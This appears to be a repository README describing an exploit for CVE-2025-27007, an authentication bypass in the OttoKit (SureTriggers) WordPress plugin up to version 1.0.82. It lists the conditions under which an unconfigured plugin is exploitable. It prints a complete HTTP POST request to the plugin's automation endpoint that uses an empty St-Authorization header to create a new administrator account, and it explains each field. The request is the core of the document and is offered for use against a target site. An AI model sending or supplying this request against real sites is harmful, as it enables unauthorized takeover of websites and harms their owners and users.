# CVE-2025-27007: OttoKit (SureTriggers) Privilege Escalation Vulnerability 

Exploitation of CVE-2025-27007, a critical vulnerability in unauthorized privilege escalation in the OttoKit plugin (formerly known as SureTriggers) for WordPress. This repository outlines how an attacker can create an administrator account on a vulnerable WordPress site.

### Affected Versions
- All versions of OttoKit (SureTriggers) **≤ 1.0.82**.
- Fixed in version **1.0.83**.

### Conditions for Exploitation
The vulnerability can be exploited under the following circumstances:
1. OttoKit must be installed and activated on the target WordPress site.
2. The plugin **uninitialized** (e.g., no API key or "secret_key" is set in the database).
3. The target site displays the REST API endpoint '/wp-json/sure-triggers/v1/automation/action'.

---

### HTTP Request
The following request targets the `/wp-json/sure-triggers/v1/automation/action` endpoint to create an administrator account:

```http
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization: 
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=attacker@example.com&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists

```
------------------------------------------------------------------

## Explanation of Request
* Endpoint: POST /wp-json/sure-triggers/v1/automation/action

* St-Authorization:  (empty): Bypasses authentication when the plugin is unconfigured.

* selected_options[user_name]: Username for the new account (e.g., new_admin).

* selected_options[user_email]: Email for the new account (e.g., attacker@example.com).

* selected_options[password]: Password for the new account (e.g., StrongP@ssw0rd123).

* selected_options[role]: Set to administrator to grant full privileges.

*  type_event: Set to create_user_if_not_exists to trigger user creation
